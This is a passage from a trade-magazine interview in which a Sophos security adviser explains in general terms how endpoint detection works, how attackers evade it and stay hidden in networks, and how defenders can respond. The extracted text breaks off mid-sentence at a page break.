Managed.IT - issue56

1 What kind security incidents are today’s detection systems designed to spot? Most modern endpoint security software is designed to block both known and unknown threats using different technologies. Generally, blocking known threats is the job of traditional security software (e.g. antivirus). If we’ve seen the malware (or malware family) before, we can quickly convict a file with a very high degree of confidence and low false positive rate. Unknown threats today are most often caught by using machine learning (ML). ML engines are trained to recognize threats based on millions of examples of good and bad files and the engine will make its decision based on examining millions of features (e.g. file type, size, compression etc.) to determine the probability of it being benign or malicious. ML is also incredibly powerful against threats at scale – some malware families routinely send out hundreds of unique variants daily and ML is very effective at large volume detection. Finally, behavioural characteristics are examined and assessed. If neither traditional nor ML-enhanced engines find enough reason to convict a threat based on how it looks, the behavioural engine can convict a threat based on how it acts. When combined with network- level detection and visibility, these systems are very effective against today’s complex threats. 2 What tools and techniques are cyber attackers using to circumvent security detection systems? What kind of attack vectors are they using? A couple of ways in which cybercriminals attempt to bypass endpoint technologies are by using obfuscation or misdirection. Obfuscation aims to hide the true nature of the file from the detection engine by encrypting or encoding the program, with some malware using multiple layers of obfuscation to frustrate analysis. Misdirection is used to fool the system into thinking it’s running a benign program, which it does initially, instead of something overtly malicious. This is frequently done by leveraging legitimate, installed applications (e.g. PowerShell) to launch additional processes and fetch malicious payloads from the internet. We have some capability in de- obfuscating malicious programs, and where it’s not possible behavioural detection can be used. The most common way to circumvent a security system is to attack vulnerable software or the user. Attacking the user is usually done via phishing campaigns and/ or malicious documents. It’s worth noting that while most malicious documents come from phishing campaigns, not all phishing campaigns contain malicious documents. A typical phishing campaign’s objective is credential theft and malicious documents can be the vector for all sorts of malware including, but not limited to, key loggers, credentials stealers, downloaders/droppers and ransomware. Attacking vulnerable (i.e. unpatched) software is also a common tactic used by cybercriminals. They can use search tools to scan the internet for potential victims and then launch automated attacks against the vulnerable targets. Once inside, the criminals often switch to manual mode where they use different tools to move laterally, elevate privilege and establish persistence. 3 How do cyber attackers manage to remain undetected inside victim networks for extended periods of time? There are many reasons why an attacker may remain undetected inside a network, but for the most part lack of visibility is to blame. This can manifest itself in different ways. One way is to deliberately leave systems unprotected. We see this all too often and without any detection software installed, you will likely never see the intruder in your network. Another way is to have so much noise in your network that you don’t know what good looks like and can’t filter it out. We see this in large, open networks where everything can talk to everything else on any protocol. Somewhere in the middle are the more advanced attackers who use knowledge of your environment to move around undetected. They will use your credentials, existing applications and approved systems to infiltrate your network and exfiltrate your data. To all intents and purposes, they are you. 4 So, what are defenders to do? As always, prevention is key. Think of prevention not only in technological terms but also organisational processes. Some criminals like to infiltrate organisations by using malicious documents (maldocs). The human resources department, for one, needs to open unsolicited documents daily. How do you protect them while still allowing business to continue? One way is to use a dedicated Tricks of the trade As always, prevention is key. Think of prevention not only in technological terms but also organisational processes John Shier, senior security adviser at Sophos, answers questions about the cyber security and cyber threat landscape in 2020 CYBER SECURITY 20 MANAGED.IT 01732 759725 Continued... John Shier